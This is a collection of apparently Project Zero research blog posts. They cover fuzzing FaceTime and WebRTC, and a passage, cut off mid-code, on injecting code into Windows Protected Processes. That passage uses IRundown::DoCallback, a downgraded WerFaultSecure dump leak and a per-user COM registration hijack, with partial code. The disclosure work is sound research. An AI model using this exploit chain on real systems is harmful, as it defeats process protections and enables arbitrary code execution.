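    print("paired", header.hex(), "with", payload.hex())

def on_encrypt(plaintext, ciphertext):
    # Called from the CCCryptorUpdate hook, before the header is final.
    payload_by_snippet[ciphertext[:SNIPPET_LEN]] = plaintext

def on_sendmsg(rtp_packet, header_len):
    # Called from the sendmsg hook, once the header and extensions are set.
    snippet = rtp_packet[header_len:header_len + SNIPPET_LEN]
    plaintext = payload_by_snippet.pop(snippet, None)
    if plaintext is not None:
        log_pair(rtp_packet[:header_len], plaintext)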
Unfortunately, this still did not replay a FaceTime call correctly, and calls often experienced decryption failures. I eventually determined that audio and video on FaceTime are encrypted with different keys, and updated the replay script to queue the CCCryptor used by the CCCryptorUpdate function based on whether it was audio or video content. Then in sendmsg, the entire logged RTP packet, including the unencrypted payload, was copied into the outgoing packet, the SSRC was fixed, and the payload was encrypted with the next CCCryptor out of the appropriate queue. If a CCCryptor wasn’t available, outgoing packets were dropped until a new one was created. At this point, it was possible to stop using the modified AVConference binary, as all the packet modification was now happening in sendmsg. This implementation still had reliability problems.
Digging more deeply into how FaceTime encryption works, packets are encrypted in CTR mode, which requires a counter. The counter is initialized to a unique value for each packet that is sent. During the initialization of the RTP stream, the peers exchange two 16-byte random tokens, one for audio and one for video. The counter value for each packet is then calculated by exclusive or-ing the token with several values found in the packet, including the SSRC and the sequence number. Only one value in this calculation, the sequence number, changes between each packet. So it is possible to calculate the counter value for each packet by knowing the initial counter value and sequence number, which can be retrieved by hooking CCCryptorCreateWithMode. The sequence number is xor-ed with the random token at index 0x12 when FaceTime constructs a counter, so by xor-ing this location with the initial sequence number and then a packet’s sequence number, the counter value for that packet can be calculated. The key can also be retrieved by hooking CCCryptorCreateWithMode.

This allowed me to dispense with queuing cryptors, as I now had all the information I needed to construct a cryptor for any packet. This allowed packets to be encrypted faster and more accurately.
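In other words, the per-packet counter can be derived directly. A sketch, where the counter buffer and initial sequence number come from the CCCryptorCreateWithMode hook; the assumption that the 16-bit sequence number is xored big-endian across offsets 0x12–0x13 is mine:

# Sketch: derive the CTR counter for an arbitrary packet from the initial
# counter and sequence number captured at CCCryptorCreateWithMode time.
def counter_for_packet(initial_counter, initial_seq, seq):
    ctr = bytearray(initial_counter)
    for offset, shift in ((0x12, 8), (0x13, 0)):
        ctr[offset] ^= (initial_seq >> shift) & 0xFF  # remove the baked-in value
        ctr[offset] ^= (seq >> shift) & 0xFF          # fold in this packet's value
    return bytes(ctr)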
Sequence numbers still posed a problem, though, as the initial sequence number of an RTP stream is randomly generated at the beginning of the call, and is different between subsequent calls. Also, sequence numbers are used to reconstruct video streams in order, so they need to be correct. I altered the replay tool to determine the starting sequence number of each stream, then calculate the offset of each logged packet's sequence number from the logged stream's starting sequence number, and add that offset to the live stream's starting sequence number. These two changes finally made the replay tool work, though replay gets slower and slower as a stream is replayed due to dropped packets.
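The rebasing itself is a one-liner once both starting sequence numbers are known; masking handles the 16-bit wrap:

# Map a logged packet's sequence number onto the live stream's sequence space.
def rebase_seq(logged_seq, logged_start, live_start):
    return (live_start + (logged_seq - logged_start)) & 0xFFFF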
Results
Using this setup, I was able to fuzz FaceTime calls and reproduce the crashes. I reported three bugs in FaceTime based on this work. All these issues have been fixed in recent updates.
CVE-2018-4366 is an out-of-bounds read in video processing that occurs on Macs only.
CVE-2018-4367 is a stack corruption vulnerability that affects iOS and Mac. There are a fair number of variables on the stack of the affected function before the stack cookie, and several fuzz crashes due to this issue caused segmentation faults as opposed to stack_chk crashes, so it is likely exploitable.
CVE-2018-4384 is a kernel heap corruption issue in video processing that affects iOS. It is likely similar to this vulnerability found by Adam Donenfeld of Zimperium.
All of these issues took less than 15 minutes of fuzzing to find on a live device. Unfortunately, this was the limit of fuzzing that could be performed on FaceTime: since it is closed source, it would be difficult to create a command line fuzzing tool with coverage like we did for WebRTC.
In Part 3, we will look at video calling in WhatsApp.
Categories: Security

Adventures in Video Conferencing Part 1: The Wild World of WebRTC

Tue, 12/04/2018 - 14:40
Posted by Natalie Silvanovich, Project Zero
Over the past five years, video conferencing support in websites and applications has exploded. Facebook, WhatsApp, FaceTime and Signal are just a few of the many ways that users can make audio and video calls across networks. While a lot of research has been done into the cryptographic and privacy properties of video conferencing, there is limited information available about the attack surface of these platforms and their susceptibility to vulnerabilities. We reviewed the three most widely-used video conferencing implementations. In this series of blog posts, we describe what we found.
This part will discuss our analysis of WebRTC. Part 2 will cover our analysis of FaceTime. Part 3 will discuss how we fuzzed WhatsApp. Part 4 will describe some attacks against WhatsApp that didn’t work out. And finally, Part 5 will discuss the future of video conferencing and steps that developers can take to improve the security of their implementation.

Typical Video Conferencing Architecture
All the video conferencing implementations we investigated allow at least two peers anywhere on the Internet to communicate through audiovisual streams. Implementing this capability so that it is reliable and has good audio and video quality presents several challenges. First, the peers need to be able to find each other and establish a connection regardless of NATs or other network infrastructure. Then they need to be able to communicate, even though they could be on different platforms, application versions or browsers. Finally, they need to maintain audio and video quality, even if the connection is low-bandwidth or noisy.
Almost all video conferencing solutions have converged on a single architecture. It assumes that two peers can communicate via a secure, integrity checked channel which may have low bandwidth or involve an intermediary server, and it allows them to create a faster, higher-bandwidth peer-to-peer channel.
The first stage in creating a connection is called signalling. It is the process through which the two peers exchange the information they will need to create a connection, including network addresses, supported codecs and cryptographic keys. Usually, the calling peer sends a call request including information about itself to the receiving peer, and then the receiving peer responds with similar information. SDP is a common protocol for exchanging this information, but it is not always used, and most implementations do not conform to the specification. It is common for mobile messaging apps to send this information in a specially formatted message, sent through the same channel text messages are sent. Websites that support video conferencing often use WebSockets to exchange information, or exchange it via HTTPS using the webserver as an intermediary.
Once signalling is complete, the peers find a way to route traffic to each other using the STUN, TURN and ICE protocols. Based on what these protocols determine, the peers can create UDP, UDP-over-STUN and occasionally TCP connections, depending on what is favorable for the network conditions.
Once the connection has been made, the peers communicate using the Real-time Transport Protocol (RTP). Though this protocol is standardized, most implementations deviate somewhat from the standard. RTP can be encrypted using a protocol called Secure RTP (SRTP), and some implementations also encrypt streams using DTLS. Under the encryption envelope, RTP supports features that allow multiple streams and formats of data to be exchanged simultaneously. Then, based on how RTP classifies the data, it is passed on to other processing, such as video codecs. Stream Control Transmission Protocol (SCTP) is also sometimes used to exchange small amounts of data (for example, a text message on top of a call) during video conferencing, but it is less commonly used than RTP.
Even when it is encrypted, RTP often doesn’t include integrity protection, and if it does, it usually doesn’t discard malformed packets. Instead, it attempts to recover them using strategies such as Forward Error Correction (FEC). Most video conferencing solutions also detect when a channel is noisy or low-bandwidth and attempt to handle the situation in a way that leads to the best audio and video quality, for example, sending fewer frames or changing codecs. Real Time Control Protocol (RTCP) is used to exchange statistics on network quality and coordinate adjusting properties of RTP streams to adapt to network conditions.

WebRTC
WebRTC is an open source project that enables video conferencing. It is by far the most commonly used implementation: Chrome, Safari, Firefox, Facebook Messenger, Signal and many other mobile applications use WebRTC. WebRTC seemed like a good starting point for looking at video conferencing as it is heavily used, open source and reasonably well-documented.

WebRTC Signalling
I started by looking at WebRTC signalling, because it is an attack surface that does not require any user interaction. Protocols like RTP usually start being processed after a user has picked up the video call, but signalling is performed before the user is notified of the call. WebRTC uses SDP for signalling.
I reviewed the WebRTC SDP parser code, but did not find any bugs. I also compiled it so it would accept an SDP file on the command line and fuzzed it, but I did not find any bugs through fuzzing either. I later discovered that WebRTC signalling is not implemented consistently across browsers anyhow. Chrome uses the main WebRTC implementation, Safari has branched slightly and Firefox uses its own implementation. Most mobile applications that use WebRTC also implement their own signalling in a protocol that is not SDP. So it is not likely that a bug in WebRTC signalling would affect a wide variety of targets.
RTP Fuzzing
I then decided to look at how RTP is processed in WebRTC. While RTP is not an interaction-less attack surface because the user usually has to answer the call before RTP traffic is processed, picking up a call is a reasonable action to expect a user to take. I started by looking at the WebRTC source, but it is very large and complex, so I decided fuzzing would be a better approach.
The WebRTC repository contains fuzzers written for OSS-Fuzz for every protocol and codec supported by WebRTC, but they do not simulate the interactions between the various parsers, and do not maintain state between test cases, so it seemed likely that end-to-end fuzzing would provide additional coverage.
Setting up end-to-end fuzzing was fairly time intensive, so to see if it was likely to find many bugs, I altered Chrome to send malformed RTP packets. I changed the srtp_protect function in libsrtp so that it ran the following fuzzer on every packet:
void fuzz(char* buf, int len) {
  int q = rand() % 10;
  if (q == 7) {
    int ind = rand() % len;
    buf[ind] = rand();
  }
  if (q == 5) {
    for (int i = 0; i < len; i++)
      buf[i] = rand();
  }
}

RTP fuzzer (fuzzer q)
When this version was used to make a WebRTC call to an unmodified instance of Chrome, it crashed roughly every 30 seconds.
Most of the crashes were due to divide-by-zero exceptions, which I submitted patches for, but there were three interesting crashes. I reproduced them by altering the WebRTC source in Chrome so that it would generate the packets that caused the same crashes, and then set up a standalone build of WebRTC to reproduce them, so that it was not necessary to rebuild Chrome to reproduce the issues.
The first issue, CVE-2018-6130, is an out-of-bounds memory issue related to the use of std::map::find in processing VP9 (a video codec). In the following code, the value tl0_pic_idx is pulled out of an RTP packet unverified (GOF stands for group of frames).
if (frame->frame_type() == kVideoFrameKey) {
    ...
    GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;
    FrameReceivedVp9(frame->id.picture_id, &info);
    UnwrapPictureIds(frame);
    return kHandOff;
}

If this value does not exist in the gof_info_ map, std::map::find returns the end iterator of the map, which points one element past the allocated values for the map. Depending on memory layout, dereferencing this iterator will either crash or return the contents of unallocated memory.
The second issue, CVE-2018-6129 is a more typical out-of-bounds read issue, where the index of a field is read out of an RTP packet, and not verified before it is used to index a vector.
The third issue, CVE-2018-6157 is a type confusion issue that occurs when a packet that looks like a VP8 packet is sent to the H264 parser. The packet will eventually be treated like an H264 packet even though it hasn’t gone through the necessary checks for H264. The impact of this issue is also limited to reading out of bounds.
There are a lot of limitations to the approach of fuzzing in a browser. It is very slow, the issues are difficult to reproduce, and it is difficult to fuzz a variety of test cases, because each call needs to be started manually, and certain properties, such as the default codec, can’t change in the middle of the call. After I reported these issues, the WebRTC team suggested that I use the video_replay tool, which can be used to replay RTP streams recorded in a patched browser. The tool was not able to reproduce a lot of my issues because they used non-default WebRTC settings configured through signalling, so I added the ability to load a configuration file alongside the RTP dump to this tool. This made it possible to quickly reproduce vulnerabilities in WebRTC.
This tool also had the benefit of enabling much faster fuzzing, as it was possible to fuzz RTP by fuzzing the RTP dump file and loading it into video_replay. There were some false positives, as it was also possible that fuzzing caused bugs in parsing the RTP dump file format, but most of the bugs were actually in RTP processing.

Fuzzing with the video_replay tool with code coverage and ASAN enabled led to four more bugs. We ran the fuzzer on 50 cores for about two weeks to find these issues.
CVE-2018-6156 is probably the most exploitable bug uncovered. It is a large overflow in FEC. The buffer WebRTC uses to process FEC packets is 1500 bytes, but it does no size checking of these packets once they are extracted from RTP. Practically, they can be up to about 2000 bytes long.
CVE-2018-6155 is a use-after-free in a video codec called VP8. It is interesting because it affects the VP8 library, libvpx as opposed to code in WebRTC, so it has the potential to affect software that uses this library other than WebRTC. A generic fix for libvpx was released as a result of this bug.
CVE-2018-16071 is a use-after-free in VP9 processing that is somewhat similar to CVE-2018-6130. Once again, an untrusted index is pulled out of a packet, but this time it is used as the upper bounds of a vector erase operation, so it is possible to delete all the elements of the vector before it is used.
CVE-2018-16083 is an out-of-bounds read in FEC that occurs due to a lack of bounds checking.
Overall, end-to-end fuzzing found a lot of bugs in WebRTC, and a few were fairly serious. They have all now been fixed. This shows that end-to-end fuzzing is an effective approach for finding vulnerabilities in this type of video conferencing solution. In Part 2, we will try a similar approach on FaceTime. Stay tuned!
Categories: Security

Injecting Code into Windows Protected Processes using COM - Part 2

Fri, 11/30/2018 - 13:11
Posted by James Forshaw, Project Zero
In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.
As a quick recap of the previous attack, I was able to identify a process which would run as PPL and which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL, and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought for exploiting full PP was to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work, as full PP ignores KnownDlls. Even if it did use KnownDlls, I don’t want to require administrator privileges to inject code into the process.
I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.
Path                                     Signing Level
C:\windows\system32\GenValObj.exe        Windows
C:\windows\system32\sppsvc.exe           Windows
C:\windows\system32\WerFaultSecure.exe   WindowsTCB
C:\windows\system32\SgrmBroker.exe       WindowsTCB
As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest: WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface; the .NET executable I abused last time also doesn’t register its COM service. So I also performed some basic reverse engineering looking for COM usage.
The SgrmBroker executable doesn’t do very much at all; it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard, and it didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM; however, I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level through hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service, if it could initialize COM perhaps there was something I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level, communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.
The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:
interface IObjectExporter {
  // ...
  error_status_t ResolveOxid(
    [in] handle_t hRpc,
    [in] OXID* pOxid,
    [in] unsigned short cRequestedProtseqs,
    [in] unsigned short arRequestedProtseqs[],
    [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
    [out, ref] IPID* pipidRemUnknown,
    [out, ref] DWORD* pAuthnHint
  );
}
In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information: an Authentication Level Hint (pAuthnHint), which we can safely ignore, and the IPID of the IRemUnknown interface (pipidRemUnknown), which we can’t.
An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.
The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.

In this example screenshot there are actually two IPIDs exported: IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Aren’t we expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and look up names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:
[uuid("00000134-0000-0000-c000-000000000046")]interface IRundown : IUnknown {    HRESULT RemQueryInterface(...);    HRESULT RemAddRef(...);    HRESULT RemRelease(...);    HRESULT RemQueryInterface2(...);    HRESULT RemChangeRef(...);    HRESULT DoCallback([in] struct XAptCallback* pCallbackData);    HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);    HRESULT AcknowledgeMarshalingSets(...);    HRESULT GetInterfaceNameFromIPID(...);    HRESULT RundownOid(...);}
This interface is a superset of IRemUnknown: it implements methods such as RemQueryInterface and then adds some additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods; they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):
struct XAptCallback {
  void* pfnCallback;
  void* pParam;
  void* pServerCtx;
  void* pUnk;
  void* iid;
  int   iMethod;
  GUID  guidProcessSecret;
};
HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {
  CProcessSecret::GetProcessSecret(&pguidProcessSecret);
  if (!memcmp(&pguidProcessSecret,
              &pCallbackData->guidProcessSecret, sizeof(GUID))) {
    if (pCallbackData->pServerCtx == GetCurrentContext()) {
      return pCallbackData->pfnCallback(pCallbackData->pParam);
    } else {
      return SwitchForCallback(
                   pCallbackData->pServerCtx,
                   pCallbackData->pfnCallback,
                   pCallbackData->pParam);
    }
  }
  return E_INVALIDARG;
}
This method is very interesting: it takes a structure containing a pointer to a method to call and an arbitrary parameter, and executes the pointer. The only restrictions on calling the arbitrary method are that you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.
What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important, as when calling methods between apartments, say calling a STA object from an MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP, the per-process secret is checked, which should limit it to only in-process callers, unless an external process can read the secret from memory.

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information (a sketch of the resulting call follows the list):
  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

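To make the shape of the attack concrete, here is a minimal sketch of what the eventual call looks like, assuming we’ve already built raw MSRPC plumbing for the IRundown interface (the rundown_proxy wrapper below is hypothetical) and recovered the secret and context values:

// Hypothetical sketch only: rundown_proxy, remote_dll_path, leaked_context and
// leaked_secret come from our own MSRPC client and the memory disclosure
// described below. All other XAptCallback fields can be left zeroed.
XAptCallback callback = {};
callback.pfnCallback       = (void*)&LoadLibraryW; // kernel32 shares a base across
                                                   // processes, so this address should
                                                   // also be valid in the target
callback.pParam            = remote_dll_path;      // single pointer-sized argument
callback.pServerCtx        = leaked_context;       // context pointer read from the target
callback.guidProcessSecret = leaked_secret;        // per-process GUID read from the target

// If the secret matches, the server executes pfnCallback(pParam) for us.
HRESULT hr = rundown_proxy->DoCallback(&callback);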
Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create, so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem: one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?
Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.
First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version of WerFaultSecure.
Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:
  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work, and it needed administrator privileges, which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

Up to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?
The reason we can’t use WerFaultSecure is that it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way that only allows Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used, recovering the unencrypted data seems like a non-starter.
However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two-step process: first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted, which means that you don’t even need to race the encryption process.
There’s one problem with this: it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypts the crash dump directly; it never ends up on disk unencrypted at any point. But that got me thinking: while they might have fixed the bug going forward, what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website, extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts that it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at the very least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all, Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks that bypass WinRT UMCI signing, so generalizing this might make some sense, especially for certain PP levels.
After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:
Parameter          Description
/h                 Enable secure dump mode.
/pid {pid}         Specify the Process ID to dump.
/tid {tid}         Specify the Thread ID in the process to dump.
/file {handle}     Specify a handle to a writable file for the unencrypted crash dump.
/encfile {handle}  Specify a handle to a writable file for the encrypted crash dump.
/cancel {handle}   Specify a handle to an event to indicate the dump should be cancelled.
/type {flags}      Specify MINIDUMP_TYPE flags for the call to MiniDumpWriteDump.
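As a rough sketch (not the code from the exploit), starting the downgraded binary protected and handing it these parameters could look something like the following; the protection-level attribute values are from the public SDK headers, but treat the exact plumbing as an assumption:

// Sketch: launch WerFaultSecure at PP-WindowsTCB with inheritable handles.
// Assumption: handle values are passed numerically on the command line and
// must be marked inheritable when created.
#include <windows.h>
#include <string>

bool LaunchSecureDump(const std::wstring& exe, DWORD pid, DWORD tid,
                      HANDLE dump_file, HANDLE enc_file, HANDLE cancel_event) {
  std::wstring cmdline = L"\"" + exe + L"\" /h /pid " + std::to_wstring(pid) +
      L" /tid " + std::to_wstring(tid) +
      L" /file " + std::to_wstring((ULONG_PTR)dump_file) +
      L" /encfile " + std::to_wstring((ULONG_PTR)enc_file) +
      L" /cancel " + std::to_wstring((ULONG_PTR)cancel_event) +
      L" /type 2";  // MiniDumpWithFullMemory

  SIZE_T size = 0;
  InitializeProcThreadAttributeList(nullptr, 1, 0, &size);
  auto attrs = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(size);
  InitializeProcThreadAttributeList(attrs, 1, 0, &size);
  DWORD level = PROTECTION_LEVEL_WINTCB;  // request full PP at WindowsTCB level
  UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
                            &level, sizeof(level), nullptr, nullptr);

  STARTUPINFOEXW si = {};
  si.StartupInfo.cb = sizeof(si);
  si.lpAttributeList = attrs;
  PROCESS_INFORMATION pi = {};
  BOOL ok = CreateProcessW(nullptr, &cmdline[0], nullptr, nullptr,
                           TRUE,  // inherit the file/event handles
                           CREATE_PROTECTED_PROCESS | EXTENDED_STARTUPINFO_PRESENT,
                           nullptr, nullptr, &si.StartupInfo, &pi);
  DeleteProcThreadAttributeList(attrs);
  free(attrs);
  return ok != FALSE;
}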
This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need, including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.

Putting it All Together

There are still two things we need to complete the exploit: how to get WerFaultSecure to start up COM, and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.
Let’s tackle the first part: how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before, so to save time I just asked him. The trick is to get WerFaultSecure to dump an AppContainer process; this results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL, which loads CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, resolving to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.
Unfortunately I’ve not been entirely truthful during my description of how COM remoting is set up. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense: if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM? In this case, even though we can make WerFaultSecure load a COM object, it doesn’t meet the conditions to set up remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below, the COM registration is queried first from HKEY_CURRENT_USER, which means we can hijack it without needing administrator privileges.

Unfortunately, looking at the code, this won’t work; a cut-down version is shown below:
HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {
  CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
  IOSTaskCompletion* inf;
  HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,
      NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));
  if (SUCCEEDED(hr)) {
    // Open process and disable PLM handling.
  }
}
The code passes the CLSCTX_INPROC_SERVER flag to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replaced the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way: the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object, its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or a MTA.
However, if the threading model were instead set to “Free” then the object would only support direct calls from an MTA, which means the COM runtime has to enable remoting, create the object in an MTA (using something similar to DoCallback), then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features, including IRundown. As we can hijack the server registration we can just change the threading model; this will cause WerFaultSecure to start COM remoting, which we can now exploit.
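As a sketch of the hijack itself (the server DLL path below is a placeholder; the real registration’s DLL should be reused so the object still functions), writing the per-user registration might look like:

// Sketch: create an HKCU class registration for the hijacked CLSID with the
// threading model flipped to "Free".
#include <windows.h>

void HijackThreadingModel() {
  HKEY key = nullptr;
  RegCreateKeyExW(HKEY_CURRENT_USER,
      L"Software\\Classes\\CLSID\\{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}"
      L"\\InProcServer32",
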